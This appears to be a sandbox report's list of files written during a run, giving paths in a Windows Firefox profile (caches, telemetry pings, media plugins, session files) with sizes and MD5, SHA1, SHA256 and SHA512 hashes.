C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\startupCache\urlCache.bin
Filesize3KB
MD5e00de35b23e6f794f5709cc223a73f77
SHA16d2f01d1e8076c17efc4d74fa000e49b38ed1c0c
SHA2565831e973a28dee3a5a86757fe831a8e6859b50d46c2d27cf183c2bd6303bbd5e
SHA512c96656d0c73a7b838663699376213ee6d97a85aa0730af17df2af1bcfdc24ce639f5119ab47d728ad27311ed3582315cbdc22592bcd8465e16e513b3d5ab2cd5
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\startupCache\webext.sc.lz4
Filesize105KB
MD5826bf357af0ba7cd24b541706eb20204
SHA1600f482a3b439f3d8e99de3de9a9f1d8c9496959
SHA256373a65974127bf674a03b1e9237b0c1eb57259766da9e8010c073a3bcbe9f625
SHA51249a9f618fe33443af0ef14689e9026436d5185f41612ff114746918c3ea88ce3e7494fee5735f3995094cdef10378481b3504f02e25c6f0fe0632b4fb6316e18
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.5MB
MD5c097289ee1c20ac1fbddb21378f70410
SHA1d16091bfb972d966130dc8d3a6c235f427410d7f
SHA256b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2
SHA51246236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\AlternateServices.bin
Filesize17KB
MD507c295fe2509ec038cc2ae6a8cfda03e
SHA1edf904dbad9a0caa81d3b8ddc817c2cf050823aa
SHA2567194a6ef47bf44b1aa69a54f2cb094ce3f86128ffe6e15dee3759929986bd876
SHA512787eb5ec7f9a044182f52046100dde5beaa4710577b83c3d386084c1f4ae164045bbaec45a1c37978d0e647ffcbc51dc960a1954fffcc248aa5a835a028e1093
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\AlternateServices.bin
Filesize6KB
MD5d9f4cb48193337a18dd563fa23bfc2e1
SHA19d8555f312bbd158d2f090763a6c46b292f99bad
SHA256a56f1603ee936d20572fd979652ddaac54330abd41342d74a24f2ba7beae4c8c
SHA512a017f8fe6452dbf3b48cde2e7420fea9131d9d1e2637a19240b47fb8192e70465124c880c690001829ecb7c0f32c2fee2454b040ac38e80a797f422903c10674
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\AlternateServices.bin
Filesize17KB
MD579c8849c5e2894c498bf3a920ce6be95
SHA12bb07e187697fd04db448a41be25c803f64b36cc
SHA256483e5020a84553bf1d0b1bcde5ccd7b43ea466925af6dab890acb2838a16cd4a
SHA5125c7ff21ce5bca72cb740ea40d17d5137e5d0ebc2448f56ca8d59316bb1a9fc106907ae97b2e98d23adee4e9a6b4871cb6ef8ee4e103102bcc3a118cc247482db
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\SiteSecurityServiceState.bin
Filesize3KB
MD529ecf50111bf83afa5c5f2150e049edd
SHA1cd2c7243469fe724cba8f87de014cf6fbfde026e
SHA256eae7a5967be2e9b4ea9b8f1ca591e0ccea4adb81f914169984933d859f43ba83
SHA512f76ed71e468e710e99324d440bf50dd9bdd4117b1ec7c8f293c1c5c731948dc56ff9e04ba5c29ec4aa5873361e60c7dad945a0ada1786030fea010e4d841105b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\addonStartup.json.lz4
Filesize4KB
MD5571801f653a793bdc39c23309572ee1a
SHA1155884f826557bdd9e3e9e75cd779b98da5b32f5
SHA256cf1f9e339d799e9fe34e665d4b2680d6ad530652210f7be0cec6a875b051f461
SHA5127caf2c7acc69c89050f7e49ae5712af080cda8e5db925d34e266414fcc2633ce92f8e6175e37aa729f7f2c6542fb6d40bf749d1d13a2ea23c1fd8b84f5a993d0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\bounce-tracking-protection.sqlite
Filesize96KB
MD5205c71c1c0d322f5bd37ba676055e4c1
SHA1c7617ba73434318af471bb32b2e3155564d62fe7
SHA25638e8c8f99549a0045182e159048202226134bf3b6fafb8d7c240dd4261be4706
SHA512c24c6caf4d30c0c362c180db1aac9b32baa2b856d9deacdb5504775e5ceae7bdc647790431dbefb5614387932e85ae548313e87b8d133ae51c712032a436a02a
-
Filesize
224KB
MD5e4c7806afb95460eb32278a1b37a3eeb
SHA1b1bc1fb233d428f120313c306d94af47b40e8ae3
SHA256e5d6b9e0e37c8d2ff4229ecafa38999ed0d58cbea9ae47862e6aba0af4ce9fc7
SHA512d3ff92051f5489245c28a786c9128db45f1ab4befc29aef9e5ec0dbe2f5bf0e45d354893d346bf78369cb852b5524a1a73707c681c2d63781332c6461a5f6c99
-
Filesize
198B
MD5ce9ef13caa8a74c25157b184aa038475
SHA1db03a9935d8bb3ce6b120aca98feade536805160
SHA256252b7fff962848c61092e82a3d87adca163849767713a93ab533bb397f1f53bb
SHA5120f6f5053e78167ef5cc5fa70ed3a87dd116df0671a590299277a197341bed983e3d77e37ad2c33cd4afe880fab9ed1c7f7502210040617a01f97a81c1e1d4f29
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\content-prefs.sqlite
Filesize256KB
MD5be3c562ea7e8d1c8e68c790481914f4c
SHA1dd66dd963beafa2bd4f9a4aa2acf615d95b35a61
SHA256cb094929393d9779bbb5cb44da04caf0b304b67509dc99e4f9b99b77539e19d2
SHA512ddcd4ac6df0a5307fecba86a8ea44c74836c6425608ecfb4dbeed7b847a639c59f9ef326afb1bf0d98619368f0e2f7c88938c4eb175979090aebd3af556a748d
-
Filesize
512KB
MD5cc1708806552a40762815dfcf6ff3c1a
SHA1b91323f2b6ce0d6419c221a07a461066f1c2362f
SHA2563b1a24e6fc5928086c8fe030dcc6b78d207cd87f88e32e79eaf3ed6f24e12299
SHA512a70ff985714a7c98a681b50611d08703cfcf3f9a5f1e1550876e00cdfbd2adc6ed7a12d44d4b35cb9b57596c7fb814c28f5b7e673db54e9adbf841c9433109bc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.bin
Filesize67KB
MD5006d344e3c88a156cb124238cc7ea690
SHA1428504ac7a321b24b33e00ff78893747048e0bac
SHA256b6e1ba8b1ee0d5eb5be2186ff4d50733aeccb54049f452ef4e119e557eebf2c8
SHA5126ebb94947cff1937ce938a92dad2e2dac1f4480fae1040d5f9bca9de8ec02c9fa5ab7c70f05c74307935ac3170ee44578f58e4086a2ca00f2f7375612e5c809d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize59KB
MD5dd29f60c6c0fc9d5932b02eef03383d7
SHA170570b84b044be95d420a82a16bc8b3f133eab09
SHA25665f696ff1f1cea31555b27911b2e19e333f1ed7feeab6650c6f652a9103fce2a
SHA512a5415fb2bcaf1563e15b48e1612df2b0db227169556d590fa2875057a1a12128a1cc7153d8aedd37eb90b2d6dd2fb3acd92c2bc81da3d8cd20f7f74a630a5da1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize67KB
MD5ab539ccfbf70e395af6541df5568d67c
SHA1dccc541f8a41f8fab060acf2ebcaf0b20b6081a1
SHA256f20c25300d9647ee0d9b9acbac96a46b91584880dc550e52d1495b92dc325110
SHA512eb5b1877c33538779d0058b69027659b582aa0b6e932cf41b8591b0ab2c71c598dc4923d5d7e9395d071a39bee79616d32ab01245a179431a5e2dec392b2bf2a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD56f4dd159dd9dc107e21bd56e29d90798
SHA15f3671a56c4ac07c3465b9e5ae56fc5e374312da
SHA256f1048cc0d0425571d7d99d974d18efc675ff5252f0dc1ce07fa3736df761c36b
SHA5125dcaefae73cac1dfad9c24f388c98ce057c7fe39cef5ccd4acc6d3c0b234afd464586912f97088f58bee939c464826ed0675f9038aee62f763ab1121c52cdbff
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize30KB
MD5e39e70c78e3efc622cd4d6376613f2d1
SHA10a67610e32d313817d0693788291e3b6b2fbf9f8
SHA2565417a8ed332b533cab80221762c2e4c015a2c6e1cc33991ad55f08d8bc5f34aa
SHA512f3d2a58bcf3102d36c77c52a7db5628b23bd32f00bfb0f9d50380b67fcffdcfb6d782ee5043c2f72545f657a3f6937ae28ec05c6ba6a17c5f473d7dd02f56608
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD520bb10ddb4570bf8fe27c74c42a8646c
SHA1c830433427d74c38b5e57cfd9db3884bc67c3c91
SHA256f97108d0181aff2ee194376d2afe70af68744aeafb69681e608da83d5e7e2fee
SHA512c10784d3ef15cc98ca04eaa1dfef4abb5cff53db30e14d9da3eb02ad11c72486833f95c34c1049a14ba37c4e35db11903ec49868d71b0ea27b863a4ea270bfa1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD5c843f59573f5bdc7109ca2c77c327969
SHA12a879e64cbed239333b2c843a6189e6b8e23d275
SHA2563e0db9b9082ffb4fb7ec518970c4b509dfd04833b58f87be01884b330f6be6f8
SHA51216718a3bf13e6466db225b3260a4e84edd3be0f439ad07f9d5f5b2cffd145d674aa75b22e0efab2b52cac606e5fe6f742f340c329af5f8c868801dc370c46217
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD517fef35dca20c01f201361ca3597f880
SHA1a0303c99fd14fb18d0bc5befdd189032c79872a5
SHA25604cf72ea21ab1c7523a0fb76cd7ab480226b06a0803306646a15687534f7c7e6
SHA512effa59131a1f938976de2cef198833174a17f62a3c286e23e2acea5f5e9f3b07b5c468de8c964defef2938168059000cad67c8464b2a0e39273fbd9784c5144a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\events\events
Filesize8KB
MD5da1f7d99d78ca2ed97920eaea168b626
SHA1f29c58b5d851b8a815496575c1b99982a9968f52
SHA25674c9ef9dbec19c4f850181fb14aab14c4a5cf5b13dfd24f97c2a6a956b9709ad
SHA5126ee48494c681c79e81adcaaecfbc86c8877c6225166645693ce69c110ff6a6ef6e3c49155543a8961a103c2e3785831f0c75dbf9e6f7790a516b9437dedc1922
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\events\events
Filesize1KB
MD5d577390d15663033686c1fd5cb411490
SHA1d0b5bca8a8c2287811b904630aee799c8bee226e
SHA256ab8b7a47337ae53100e11c32225dab124642eac2a19b40252a6415ffbc17643a
SHA512e5135f58159d28ef0718bd901f5dbc62006254801c80f840b4a663766c31f313cce2b1af6829890a37200a2387c1d066231fe6827d6f8cdf79fb2e5a1b44c403
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\events\events
Filesize5KB
MD52c0dfec2dd0ff2c6a69e22927185ad3f
SHA146450dd4f0314ef81e1018b609d1c87b054feb3d
SHA2569d4e66c7bf12172896374861b84066bdf25833aa5326685044d1f1b1f8d9d3f2
SHA5129649683aae690711126e6f68dbf2e43e93b8390a684382c06a0d2ceecc44e8e55427e7eccc50f1eee67dc5cd62d266898ffc9a20f5bc8c40ea88b5afd94d935d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\events\events
Filesize1KB
MD5ef6da8a8e7bddbf58ea85af226503219
SHA1de86123ddd5299a14c3d05594d92e07dd51e7189
SHA2565f032ceb54b1ddf3b92dccd603aa21f6c05af2eacbdd44089a5e3815700f9567
SHA5125c06c08cac4b915131b7ef59b28879c6dedff16d0c2116c179c17b607e018d26f28a996e6919c9ef96b0bf8edf919c4adb1d0c3255341223cd9b189564ed2ee3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\events\pageload
Filesize1KB
MD53e1a41c8ce1102d7691d9488eabc7e65
SHA135c35bca5c24cb450490f84b3e7b6340375c7cf7
SHA25652f9bf97b59afa2e516fd8ba7cbe4f6ecfb245b435d29ab4a1dac961e1189276
SHA512712e9ab85e3f5ba5b39ccb661973cbaca6741063ad06141242cfc7568e3c87c7160a5dedffc67f51eb5da0b37e3a1583f9c8b76929ea357657e304597f3f3576
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\4fa3eb86-49d5-41c3-bd21-80302363c209
Filesize281B
MD54983fda220e1ecd134a8cfd96e6ddc5f
SHA112c41eec58cecca576f2f8c4e9cf8105801932be
SHA25664c8038edf0a12a71cbc400d6b9dc5eb8c2a3def521207b45419d9f78121a336
SHA512160528575ea9045eadfc4ad54ca140d5f2c7c06363389526f8814fc96ea8d2cb02f369b2bc153afe10009ebe5745fd3da5591b06f0ba8843653eac9cc9cf5672
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\5aeb8140-3ea5-4e85-84ca-e40f560f64c7
Filesize235B
MD5dc1f987c53d369ca62964c78012bbc69
SHA15552e899d81b121dbff7c4632a0b6de2949e6a7b
SHA2562ba3b5d3e8fda8022543e204e13d3be87ec3c238e7a5083dec136cdf1b82366c
SHA512273ee3397e2449677bc23b2374eccf2664c31b39867e5438812962ab73fc73aa415acc3ec1c71f799cd53d7b2c5db080779a5d417e8c763455a423a98f2d6abb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\6dceaa76-fbcd-462c-8069-58683343ab33
Filesize235B
MD5cf982407cd415bb879e69fe04713fe29
SHA128bcd726fc7ae71f8f822e1f888eb51a806b3a6e
SHA25684321c57eb3b5ee91a46dd08f61635fbcc94eef2da74252ca80ab0dbe8d682cf
SHA5120add336e4f4687a2b294cfab04e05a207cc478f56bec155cf19ca00fc0d098ea6463e6e0adeda805d1d350ed94e881a377fa27a37aadfb0abe3f6effbc3f7f3f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\7a187ed2-3c31-477b-81f0-e9638c891597
Filesize1KB
MD59c02797509bac41ddc41c6dc8aeedb58
SHA123293a6b2f46b721fd785e158422bdfc1860ce76
SHA256938098b54928a1e303e8fda73c0736af68024e816e90da67107ac811f52ec604
SHA5125382c205b27830a8c99853018fe171655ed595bad88e5989aa07a383671f65dff428d8b811e00c7d07f3c8c79c4adb81ec4ea3f408cf33e1a9d94fe9c06b7612
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\95b3ce53-5972-4acf-9946-405ab787f483
Filesize973B
MD5fa17376005e1cfd3e09dda69150ab6cd
SHA18b48babc1bec10127f4bf1a21402c235640f6610
SHA2564f86dde175933c0e357d6002338caa3a5a14a245279f39270892928277e4e010
SHA512a9ded378ab569116a32f7162c7057150e7eb2d871be048d0151c1b9d23b619c6c31cf0db48aaa2362ca5801c10531c554e65fcc3bc7b6f78f3af126915f697c9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\bdfb83a2-48e3-49d5-81db-f4b6f55e4ed1
Filesize9KB
MD5995b0d0f841fce1f8ce4946a1499187d
SHA1fbe73a4163aff1b19b7c0f1e2af7e342bcccb0b9
SHA256c5d80edc7c4b790b8a0ea3fe3fe360934604759ad92bb35cbe35a7ed920efba4
SHA512c555fe99810491254b9fb6b7b0e7fb0da88059113771e7bab6ac9359561ffc1432e4b188266c582e5ca1af5e3d23641f1438ce934f3bf9c647734d13d92029f6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\c678ef62-6739-4f8d-b581-d3babd4def2a
Filesize883B
MD59d08fb5ec7ef13eb4a0b9d7c6157548f
SHA102391a7cc1e428d11c4bed2ad4ef7b5c4be4fb22
SHA256dceb0e196219cbadcf80cde541360473f131a822c8b6587cb762f0df49edc934
SHA512761ec4225fe25c0cd567c5bd4d965c42792f0408ef7a746f7788e13af630b23f32c01a3f9536261d4996f9a642f53c91ddf550d96703a7663271619b913a6049
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\d0a40a16-263f-4d9d-9c48-8b3fd0192d0a
Filesize16KB
MD50e42e4f79404b0d6cc6ceebd01bcfb1a
SHA18bbce6f5d92968f1302fa67dbef27e4bf4d67871
SHA25637b34978936aec5cc138f4120c5f423544a48641d0bba6eeb58c269b1991c463
SHA5123fc64a5c00568c3941a2b5c3b2b29985c8ca045fe9f2df9d959ff4df3d916f1419d8c4e1f9b1844e324bc4e1236b423534130a5e8856c1ef273b2492af653b54
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\dc9cf342-e6cb-4a43-a161-faea39adc8bb
Filesize886B
MD5ee0c77d7f9ef99420ec8852246085c2a
SHA16bdacc20856b5bcadb9ed8a30625f174a828c4c3
SHA256b79866411ab1f44754fc2cba337f3c750c123bf6abd6f129c70ca753fa1d7d73
SHA51293e8abaac0ee687bc96b8727acfcd86f179349e631ca6510cbe9bcc34e2b776e5313715fed4a5044c65887400d854b2ff31a19d347a8d6e937b0b61d5b6a4286
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\eebb4d06-04eb-4a41-b7b1-3d804df23225
Filesize2KB
MD564090114d4732d7c314e7f796e77bf65
SHA1b587c9032539536caf9b8f791537e8a440d95f1c
SHA2568123289b05b5b6ed769fc37d7f62d3fb0729f08f460339e43ac9be787f79a615
SHA5128428685712501f8f596be16e8f31205228e164b0418dfcfcd8f9e5f586df8b80b9b863e381d0362515f4d0ac5a8189b3c1d64a150bc0799dcd2a2d946c8f6d4d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\datareporting\glean\pending_pings\fdfa73e0-5caa-4b48-9852-a57d735b9946
Filesize23KB
MD53c2b76338430c3de7f63a1364d20d836
SHA1b87ece349e8e7c15a34d620f2cbcc922fdbf961a
SHA2566a62168df2de70f20b174e828f43544cd62eb82ba86640b2465d31ea2c9359f5
SHA51281a57e2b3b1f704ebb1f7d926bd2ca2444301dd4647f40c7b661f7dc94dc93c2ae3c4726cb465d74da0543c76c63bff19615240584138ebe066e28ec50721b60
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\domain_to_categories.sqlite
Filesize96KB
MD57231237395096e88196ba0ffd7ac0ac6
SHA1d303ddfed1d4341f30ed79abbc23ce51f651bd35
SHA256c7baab1cd8662625bc822a3c3c7b57973b927cd5c26192d6cda60ed9ecc0ed07
SHA5126220c9908bfa889f1db84625dc214127ee76c40c97a0d2b81df251253d4a8cc7ba6387d94f751a8f092850ce8a86d5c7e0d7938b85ef763813c4ab4a0834055c
-
Filesize
16KB
MD51eaa9d34472e4b7315b6d9765295f9b4
SHA12a4ad336275cd56e107cc6905306e627940c7479
SHA2562498d0a98ca49b64c47dda688ba2fc3de5e4f55589c41bc0c6c6f8f4a81def71
SHA512061fea4b7b3e46cd596c8caf4db034d050beb45fcd908c8937df0c9c821d30f518b345b0ccac8cf37707271275ce9ebb7abe0604a19766e4ec5a93f5538cb728
-
Filesize
5.0MB
MD5052a97d74fc0dda163eeaeecd6472a24
SHA1070aaead9c8e54b3c6b52420eb555a4e5fb8001d
SHA256707d1b0c3612c66271f15143c4688cd712851f645868781f4bb25560f2c7caed
SHA5128416fb8f120753dbe492f1ca184ef68aa50bb985754e859b51b488c03cf9fb35531d5489b60c1492951c5d39af71ee4d10674baa39cc4e688c67df3258afd66f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
96KB
MD5b2183bbb30f1e48b637604ca14903412
SHA12344e2509baf96bdad1b1b4544c13f5c382456ee
SHA2563e3441f33f6bc96f52bb955cef4c4a7c8291c19573fda70010855f71aa03dfa1
SHA51278ff09bf2a03f7063e77b869474a78a51d215b4486549a72f45e48c0ccb87f832835731fd7961f501c68eb4d7d7386f2ac44b64fd17a7a879bdffbfa765f0f32
-
Filesize
5.0MB
MD52885d0ff36c77045a4badddfd502883d
SHA120ef6c2e84a2b99a7332802ef8883ef491703fc5
SHA256a0476923bac79576917306050fdd4176d62fc21616b760518d90127cd2fa2ee8
SHA512d512f73a3aeac83b4fb73de777edf2da28d2ac9298cb6c5a54d99adff00f6aab19e40332b9b9058c19eb5c2a5fe71c702f2a3cc9e2c537902de0700d504821ed
-
Filesize
7KB
MD5c6aa9e985d13d36090f61e79316b70cd
SHA15a00422a63ffa14cb6a5d018718946ec00b4b943
SHA256a7e233f8245f9a13958f0f00debca54f81cb1957346334646f209afe0e5b1f2c
SHA5120dd546cde7bb7182acc5915d40d19d8634476f319c39adea815d5b191c1da2ba699838a80c305df5dcab2815d492f3098b07f6f47ed21f6d998b9f1fc6ac0d50
-
Filesize
11KB
MD5445ad78b1eabf1e2fb3472476d02f4e5
SHA130553968005539ae6d3a6474d1ea54b7781b0956
SHA25601d0f53e55bd74f3d6fb31a8241b7c32a146d3c3f327586dfa8a1ba4986ec68a
SHA51292b947b719f6f457dae2e8f2879b4721fa100e70d3c03ebe00b7efc02254df17bb1afde3c9b1cf424e503554e30de7bb8eea5bb7589d7baa353c350e08586735
-
Filesize
6KB
MD587d0393faa2b4ae05a36c29e2279b6f4
SHA134a0fd9b34047a2df4a9691bf7cf42f78c3195fe
SHA256829cb4cb8e381c1772593e9faa28640da1df012358869bd0699c9045df00e595
SHA512eb1a27ae06bc9bf09ec24005db5158f9b35f454a2419f00b08780700880997db1fffa2ca9646987107ff46e33d2092be2ec8648bff5ccfa56f1a0375061e166f
-
Filesize
11KB
MD508952d1e7e7287fe5d2f8722fade3072
SHA1e56902209cb1f79ea64b13bc24823d53ddf2b224
SHA25628c1dd84779a4784d1dda917c1a6e6b2bc627479c5c507451b1fb3fed654f8cc
SHA512bef11f68493a0bd348e6adc860d2aeff2d8c1979cd15a856a83d62cf6db998f5c8756ab376ccb03968e0c1561babc87211ca58770134ea3b3b5b840a9ffae87d
-
Filesize
11KB
MD5f01c1219d84bd8037af0b55fb362f40c
SHA191e2467215ded54b303779eb88d64870cad54b72
SHA256bf31ed0327e381e1516bba33d03c63f2f5ee74a4bd9d3d1e90c42fcbf14a5f06
SHA512f3b84fd0dc783bdd3e608116ee6b6b08a81873d118c79614295d35237c7caa82b0b2b9a2c0aef6723c7bbba0cc34d339e3508c4a3d63494329bf9b1db05e71c5
-
Filesize
6KB
MD5c96ecfdb2c1102b9fd41e937e6ae8209
SHA1eca1ce6ca913abf6c5df0c5c112facea278e676e
SHA256377ce1e6e0369486ed47144936b4ba470be9ae2d02cd2814bcd795df6e6dca33
SHA51201cf9628f88d65b1d8978e2153f8559f7d13773ef4f35eb32ba5c9ec275d54b2ca147ff1f5e85d9a3f8063cae4988ff4cbfe4a2feb0e2851d7a97d47260c5706
-
Filesize
8KB
MD58edd0e9a9263d782fcb6ad6286332cd0
SHA17af4708f3ed9df951f4c5a26f16e17887ddaee1c
SHA256efe4130f2f27853a4d1020a45eb121c82a428ed423ac8d733179b667d15da642
SHA51255b61b1467ba82149190ed7db764d2832b562bdf2fab6e6d8833b553872c43ff36fa6466508e37bb23d33b298c3248ba871fe6cbe2ee841f2353be3ccad178cf
-
Filesize
64KB
MD563b6f9d979a2cd96d93c105805cafcfc
SHA15fc70ce8799617202d1b2a350f6d596b65d48e54
SHA256f47973dd13805200a469d534a0ec50e224f0c12ae77d93a0e5bcc267af19c145
SHA512ca475720928bd40abab686efb8b890fdccef59c292b26263d41bfd9dfe8f35d21405820e10505fa7cff49eea5ae57ffdbd6ca73d5cf6e1cfe67f5994d2823b90
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionCheckpoints.json
Filesize288B
MD5948a7403e323297c6bb8a5c791b42866
SHA188a555717e8a4a33eccfb7d47a2a4aa31038f9c0
SHA2562fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e
SHA51217e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yl5uz7ru.default-release\sessionCheckpoints.json
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
